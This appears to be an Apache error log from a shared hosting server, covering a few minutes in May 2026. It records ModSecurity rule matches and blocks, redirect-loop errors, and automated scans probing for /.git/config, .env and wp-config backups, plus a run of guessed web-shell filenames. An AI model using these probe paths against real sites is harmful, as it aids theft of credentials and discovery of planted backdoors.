[Mon May 11 23:03:47.932053 2026] [security2:error] [pid 1630927:tid 1630934] [client 34.39.49.173:39154] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agJEM2iGYYhUwDaJINmY-QAAAUQ"]
[Mon May 11 23:03:47.932298 2026] [security2:error] [pid 1630927:tid 1630934] [client 34.39.49.173:39154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agJEM2iGYYhUwDaJINmY-QAAAUQ"]
[Mon May 11 23:03:47.932694 2026] [core:error] [pid 1630927:tid 1630934] [client 34.39.49.173:39154] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:03:47.933210 2026] [security2:error] [pid 1630927:tid 1630934] [client 34.39.49.173:39154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agJEM2iGYYhUwDaJINmY-QAAAUQ"]
[Mon May 11 23:04:11.167335 2026] [core:error] [pid 1605480:tid 1605522] [client 34.162.62.106:50734] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:04:11.167388 2026] [core:error] [pid 1605480:tid 1605522] [client 34.162.62.106:50734] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:04:11.396678 2026] [core:error] [pid 1606352:tid 1606436] [client 34.162.62.106:50748] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:04:11.397146 2026] [core:error] [pid 1606352:tid 1606436] [client 34.162.62.106:50748] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:04:11.733470 2026] [core:error] [pid 1588898:tid 1588902] [client 34.162.62.106:50752] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:04:11.733500 2026] [core:error] [pid 1588898:tid 1588902] [client 34.162.62.106:50752] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:04:11.964852 2026] [core:error] [pid 1590352:tid 1590397] [client 34.162.62.106:50768] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:04:11.964901 2026] [core:error] [pid 1590352:tid 1590397] [client 34.162.62.106:50768] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:04:12.187785 2026] [core:error] [pid 1605480:tid 1605542] [client 34.162.62.106:50780] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:04:12.187821 2026] [core:error] [pid 1605480:tid 1605542] [client 34.162.62.106:50780] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:04:12.410308 2026] [core:error] [pid 1588898:tid 1588913] [client 34.162.62.106:50792] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:04:12.410334 2026] [core:error] [pid 1588898:tid 1588913] [client 34.162.62.106:50792] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:04:30.537645 2026] [security2:error] [pid 1588898:tid 1588921] [client 43.134.127.70:55716] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJEXqFW67LJTsgN3jQYJwAAABc"]
[Mon May 11 23:04:37.854232 2026] [security2:error] [pid 1605480:tid 1605535] [client 176.65.139.235:51264] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJEZR2Cvzd_nyNfUm8LfwAAAQ0"]
[Mon May 11 23:04:37.854388 2026] [security2:error] [pid 1605480:tid 1605535] [client 176.65.139.235:51264] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJEZR2Cvzd_nyNfUm8LfwAAAQ0"]
[Mon May 11 23:04:37.857745 2026] [security2:error] [pid 1605480:tid 1605535] [client 176.65.139.235:51264] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJEZR2Cvzd_nyNfUm8LfwAAAQ0"]
[Mon May 11 23:04:38.679529 2026] [security2:error] [pid 1590352:tid 1590407] [client 43.154.140.188:52700] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/evaluation/"] [unique_id "agJEZq1q0G_aXAqWauQHKQAAAI8"]
[Mon May 11 23:04:43.710144 2026] [security2:error] [pid 1588898:tid 1588922] [client 43.156.71.177:33050] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/table-jardin/"] [unique_id "agJEa6FW67LJTsgN3jQYLwAAABg"]
[Mon May 11 23:04:49.286449 2026] [security2:error] [pid 1605480:tid 1605537] [client 45.133.170.250:47749] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJEcR2Cvzd_nyNfUm8LxgAAAQ8"], referer: https://www.piregwan-genesis.com/
[Mon May 11 23:05:09.899006 2026] [autoindex:error] [pid 1605480:tid 1605537] [client 34.245.227.9:55070] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:05:23.823804 2026] [security2:error] [pid 1588898:tid 1588918] [client 43.165.67.31:60322] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/wp-json/wp/v2/pages/2"] [unique_id "agJEk6FW67LJTsgN3jQYVQAAABM"]
[Mon May 11 23:06:40.818760 2026] [security2:error] [pid 1588898:tid 1588903] [client 43.157.156.190:55368] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "domaine-de-janasse.com"] [uri "/"] [unique_id "agJE4KFW67LJTsgN3jQY0QAAAAQ"]
[Mon May 11 23:06:43.258904 2026] [autoindex:error] [pid 1590352:tid 1590395] [client 34.244.82.128:55002] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:06:53.687405 2026] [security2:error] [pid 1605480:tid 1605531] [client 129.226.83.4:56122] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-mobilite-regional.com"] [uri "/"] [unique_id "agJE7R2Cvzd_nyNfUm8MTAAAAQk"]
[Mon May 11 23:06:57.033474 2026] [security2:error] [pid 1606352:tid 1606422] [client 129.226.83.4:36308] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agJE8Xo_DFxNSZVmaX3dgwAAAMM"], referer: http://www.pole-mobilite-regional.com
[Mon May 11 23:07:01.569762 2026] [security2:error] [pid 1601130:tid 1601173] [client 129.226.83.4:43796] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agJE9XEgAO_835W6c1mjMQAAAFc"], referer: https://www.pole-de-mobilite-regional.com/
[Mon May 11 23:07:11.214962 2026] [core:error] [pid 1601130:tid 1601150] [client 34.186.253.242:44512] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/wp/
[Mon May 11 23:07:11.215355 2026] [core:error] [pid 1601130:tid 1601150] [client 34.186.253.242:44512] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/wp/
[Mon May 11 23:07:11.668533 2026] [core:error] [pid 1606352:tid 1606430] [client 34.186.253.242:44520] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/backup/
[Mon May 11 23:07:11.668575 2026] [core:error] [pid 1606352:tid 1606430] [client 34.186.253.242:44520] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/backup/
[Mon May 11 23:07:12.119200 2026] [core:error] [pid 1588898:tid 1588908] [client 34.186.253.242:44524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/new/
[Mon May 11 23:07:12.119246 2026] [core:error] [pid 1588898:tid 1588908] [client 34.186.253.242:44524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/new/
[Mon May 11 23:07:12.570900 2026] [core:error] [pid 1630927:tid 1630951] [client 34.186.253.242:44526] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/old/
[Mon May 11 23:07:12.570940 2026] [core:error] [pid 1630927:tid 1630951] [client 34.186.253.242:44526] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/old/
[Mon May 11 23:07:13.016013 2026] [core:error] [pid 1606352:tid 1606438] [client 34.186.253.242:44536] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/blog/
[Mon May 11 23:07:13.016047 2026] [core:error] [pid 1606352:tid 1606438] [client 34.186.253.242:44536] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/blog/
[Mon May 11 23:07:13.471379 2026] [core:error] [pid 1590352:tid 1590401] [client 34.186.253.242:44548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/
[Mon May 11 23:07:13.471504 2026] [core:error] [pid 1590352:tid 1590401] [client 34.186.253.242:44548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/
[Mon May 11 23:07:13.923449 2026] [core:error] [pid 1606352:tid 1606436] [client 34.186.253.242:44550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/wordpress/
[Mon May 11 23:07:13.923587 2026] [core:error] [pid 1606352:tid 1606436] [client 34.186.253.242:44550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://crm.rentparadise.fr/wordpress/
[Mon May 11 23:07:18.684546 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/moon.php
[Mon May 11 23:07:18.822231 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/a1.php
[Mon May 11 23:07:18.945795 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/ahax.php
[Mon May 11 23:07:19.520310 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/lite.php
[Mon May 11 23:07:19.669847 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/k.php
[Mon May 11 23:07:19.788096 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/leaf.php
[Mon May 11 23:07:19.931108 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/wp-conflg.php
[Mon May 11 23:07:20.083283 2026] [security2:error] [pid 1605480:tid 1605533] [client 43.161.234.148:53672] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agJFCB2Cvzd_nyNfUm8MaAAAAQs"]
[Mon May 11 23:07:20.087055 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/wp_filemanager.php
[Mon May 11 23:07:20.221717 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/pp.php
[Mon May 11 23:07:20.340045 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/index26.php
[Mon May 11 23:07:20.458675 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/12.php
[Mon May 11 23:07:20.590996 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/Marvins.php
[Mon May 11 23:07:20.709291 2026] [security2:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.backup"] [unique_id "agJFCHEgAO_835W6c1mjTQAAAEY"]
[Mon May 11 23:07:20.709419 2026] [security2:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.backup"] [unique_id "agJFCHEgAO_835W6c1mjTQAAAEY"]
[Mon May 11 23:07:20.709725 2026] [security2:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.backup"] [unique_id "agJFCHEgAO_835W6c1mjTQAAAEY"]
[Mon May 11 23:07:20.835000 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/aa.php
[Mon May 11 23:07:20.953217 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/abcd.php
[Mon May 11 23:07:21.099657 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/a2.php
[Mon May 11 23:07:21.217836 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/wp-gr.php
[Mon May 11 23:07:21.349547 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/xynz1.php
[Mon May 11 23:07:21.487314 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/uqcxit7i.php
[Mon May 11 23:07:21.605175 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/display_info.php
[Mon May 11 23:07:22.603861 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/wp-config-disabled.php
[Mon May 11 23:07:23.572635 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/test_info.php
[Mon May 11 23:07:23.638127 2026] [security2:error] [pid 1590352:tid 1590403] [client 43.161.234.148:47406] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agJFC61q0G_aXAqWauQH2QAAAIs"], referer: http://www.jeanboyault.fr
[Mon May 11 23:07:25.341673 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/spip.php
[Mon May 11 23:07:25.371540 2026] [security2:error] [pid 1630927:tid 1630947] [client 170.106.165.76:40304] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/lage-de-raison/"] [unique_id "agJFDWiGYYhUwDaJINmaMQAAAVE"]
[Mon May 11 23:07:25.471176 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/wp-index.php
